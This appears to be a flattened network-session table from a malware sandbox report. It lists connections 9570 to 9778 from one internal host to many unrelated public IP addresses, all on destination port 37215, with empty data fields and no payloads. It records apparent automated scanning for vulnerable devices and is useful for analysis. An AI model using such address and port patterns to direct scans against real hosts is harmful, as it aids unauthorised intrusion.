                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9570192.168.2.1336352197.243.41.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9571192.168.2.135885817.214.39.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9572192.168.2.1333636165.164.245.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9573192.168.2.135263241.101.118.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9574192.168.2.1339790197.43.42.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9575192.168.2.13487148.81.128.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9576192.168.2.135348690.10.249.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9577192.168.2.135033441.118.59.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9578192.168.2.1344906157.100.58.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9579192.168.2.1333508199.250.133.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9580192.168.2.133533041.140.26.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9581192.168.2.1335652197.217.108.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9582192.168.2.133506841.25.101.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9583192.168.2.1359158157.169.188.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9584192.168.2.1336016197.166.14.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9585192.168.2.1352744197.80.176.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9586192.168.2.135199041.36.83.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9587192.168.2.133664884.201.40.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9588192.168.2.1339966197.211.26.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9589192.168.2.1340044203.4.174.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9590192.168.2.1357580157.56.161.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9591192.168.2.134061641.11.102.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9592192.168.2.1342050197.96.62.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9593192.168.2.135483641.233.156.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9594192.168.2.1339330197.236.229.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9595192.168.2.1358848103.55.69.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9596192.168.2.1346504157.128.85.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9597192.168.2.1352120209.243.146.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9598192.168.2.1349336197.253.7.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9599192.168.2.1340132157.15.50.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9600192.168.2.1345996197.65.10.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9601192.168.2.133512880.29.253.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9602192.168.2.1346432157.133.8.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9603192.168.2.1334466197.92.105.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9604192.168.2.1358624197.167.181.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9605192.168.2.1334194131.117.138.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9606192.168.2.1356284197.244.18.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9607192.168.2.1352818157.164.84.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9608192.168.2.1340986197.16.66.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9609192.168.2.1338282157.122.150.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9610192.168.2.1359642197.240.58.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9611192.168.2.1339534157.34.40.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9612192.168.2.1349996197.95.113.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9613192.168.2.1345860140.202.121.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9614192.168.2.1356070197.221.174.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9615192.168.2.1335764197.247.25.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9616192.168.2.1352112174.234.251.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9617192.168.2.13464005.40.49.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9618192.168.2.134601641.184.230.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9619192.168.2.1350130189.48.47.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9620192.168.2.1349406157.152.69.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9621192.168.2.135528841.23.129.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9622192.168.2.134456041.123.146.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9623192.168.2.133363041.187.197.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9624192.168.2.1345794157.91.150.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9625192.168.2.1338656197.55.208.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9626192.168.2.1336196157.105.222.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9627192.168.2.134236041.225.49.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9628192.168.2.1350856197.144.234.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9629192.168.2.133792441.43.128.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9630192.168.2.1346514197.83.80.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9631192.168.2.1357430185.235.234.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9632192.168.2.1358008157.126.188.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9633192.168.2.1334374197.22.178.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9634192.168.2.1349638157.132.220.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9635192.168.2.1353946157.116.160.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9636192.168.2.1356496145.171.192.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9637192.168.2.134781841.139.75.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9638192.168.2.1345686157.189.204.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9639192.168.2.136024813.191.85.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9640192.168.2.1356130157.161.52.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9641192.168.2.13591229.208.192.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9642192.168.2.1357174197.66.152.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9643192.168.2.1349614158.125.242.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9644192.168.2.1343728157.26.101.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9645192.168.2.1341888157.110.205.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9646192.168.2.1336510197.76.141.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9647192.168.2.135769041.45.170.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9648192.168.2.1340460157.115.146.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9649192.168.2.1347634197.67.193.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9650192.168.2.1351910158.33.155.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9651192.168.2.1357436157.134.153.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9652192.168.2.1350944197.207.114.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9653192.168.2.1352990139.56.231.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9654192.168.2.135216048.92.238.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9655192.168.2.1352400209.79.110.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9656192.168.2.1359862157.8.142.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9657192.168.2.1335168157.79.151.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9658192.168.2.133857663.80.229.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9659192.168.2.1348518197.192.224.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9660192.168.2.1341666157.139.179.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9661192.168.2.134859241.4.65.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9662192.168.2.1355570197.195.72.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9663192.168.2.134081841.35.127.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9664192.168.2.1356092197.206.51.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9665192.168.2.1344964157.254.119.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9666192.168.2.1335980157.53.92.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9667192.168.2.1360374157.55.61.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9668192.168.2.135993041.154.94.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9669192.168.2.1340012201.123.251.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9670192.168.2.134138041.203.8.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9671192.168.2.1342596157.230.122.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9672192.168.2.133677681.239.231.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9673192.168.2.133825272.195.163.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9674192.168.2.1352698197.172.208.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9675192.168.2.133660241.43.98.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9676192.168.2.1342844157.90.74.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9677192.168.2.1360978157.129.211.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9678192.168.2.135347441.11.218.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9679192.168.2.134130074.157.22.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9680192.168.2.1354716131.157.185.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9681192.168.2.135904438.218.169.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9682192.168.2.135349050.115.79.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9683192.168.2.135265841.102.212.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9684192.168.2.134449041.49.166.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9685192.168.2.133488841.102.126.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9686192.168.2.1345956157.189.254.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9687192.168.2.1333692197.8.189.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9688192.168.2.1350446157.237.196.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9689192.168.2.1348472157.227.220.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9690192.168.2.1353738157.46.229.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9691192.168.2.1343162157.43.72.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9692192.168.2.1350516157.35.167.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9693192.168.2.1359218157.165.240.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9694192.168.2.1332814157.101.94.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9695192.168.2.1353054157.182.204.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9696192.168.2.1332886197.55.243.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9697192.168.2.1341064197.10.106.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9698192.168.2.134661496.168.229.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9699192.168.2.134710641.18.64.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9700192.168.2.1345720157.32.232.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9701192.168.2.135783241.61.255.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9702192.168.2.1345410157.58.217.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9703192.168.2.134188854.186.181.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9704192.168.2.1356690130.216.72.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9705192.168.2.1358962196.176.205.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9706192.168.2.1339830197.81.253.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9707192.168.2.1359622157.125.167.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9708192.168.2.1337432197.85.27.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9709192.168.2.1343812157.205.103.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9710192.168.2.1358740177.225.63.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9711192.168.2.135962041.37.189.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9712192.168.2.1351788197.191.148.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9713192.168.2.1339246149.227.197.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9714192.168.2.1344054157.153.63.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9715192.168.2.1346766197.217.91.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9716192.168.2.1340932157.142.148.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9717192.168.2.1355990157.70.234.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9718192.168.2.1333344157.165.167.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9719192.168.2.1338746157.209.53.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9720192.168.2.134276268.177.23.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9721192.168.2.135301041.210.204.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9722192.168.2.1334060158.143.99.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9723192.168.2.134593441.3.16.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9724192.168.2.1337278197.224.42.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9725192.168.2.1354998157.251.120.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9726192.168.2.1344314197.59.107.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9727192.168.2.135604088.87.21.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9728192.168.2.134288862.154.213.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9729192.168.2.135052241.168.0.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9730192.168.2.135483499.27.247.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9731192.168.2.1359058197.115.163.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9732192.168.2.133862841.120.211.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9733192.168.2.134498640.167.104.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9734192.168.2.133626241.72.44.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9735192.168.2.133574041.7.213.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9736192.168.2.1350134132.122.132.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9737192.168.2.1356088157.167.34.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9738192.168.2.135042841.88.9.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9739192.168.2.1356600161.59.201.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9740192.168.2.133999032.27.107.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9741192.168.2.1336618218.44.4.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9742192.168.2.133395841.85.83.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9743192.168.2.1360894197.92.6.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9744192.168.2.1340462197.26.188.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9745192.168.2.134262841.173.245.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9746192.168.2.1338904118.105.239.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9747192.168.2.135727264.209.91.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9748192.168.2.1359572153.53.125.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9749192.168.2.1348662221.247.16.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9750192.168.2.133674041.35.193.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9751192.168.2.1335032136.75.160.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9752192.168.2.135814441.242.24.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9753192.168.2.135450640.170.230.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9754192.168.2.1335122157.5.38.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9755192.168.2.1337154197.55.180.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9756192.168.2.1349622139.102.92.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9757192.168.2.1346246157.153.196.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9758192.168.2.1336470157.241.176.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9759192.168.2.1342032107.121.87.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9760192.168.2.1356902157.88.241.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9761192.168.2.1337406157.22.35.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9762192.168.2.1340442197.33.214.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9763192.168.2.1360996197.153.16.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9764192.168.2.135698641.252.90.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9765192.168.2.134621841.160.8.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9766192.168.2.1346702157.223.148.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9767192.168.2.1357274148.175.151.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9768192.168.2.134917441.242.77.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9769192.168.2.1335962157.206.48.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9770192.168.2.1356664197.125.244.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9771192.168.2.1354692197.194.204.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9772192.168.2.1349258157.174.126.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9773192.168.2.1334816197.203.79.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9774192.168.2.134721841.163.150.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9775192.168.2.1336868157.99.197.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9776192.168.2.1357626152.105.206.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9777192.168.2.1343830197.25.37.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9778192.168.2.13515102.224.45.18637215
                                                  TimestampBytes transferredDirectionData


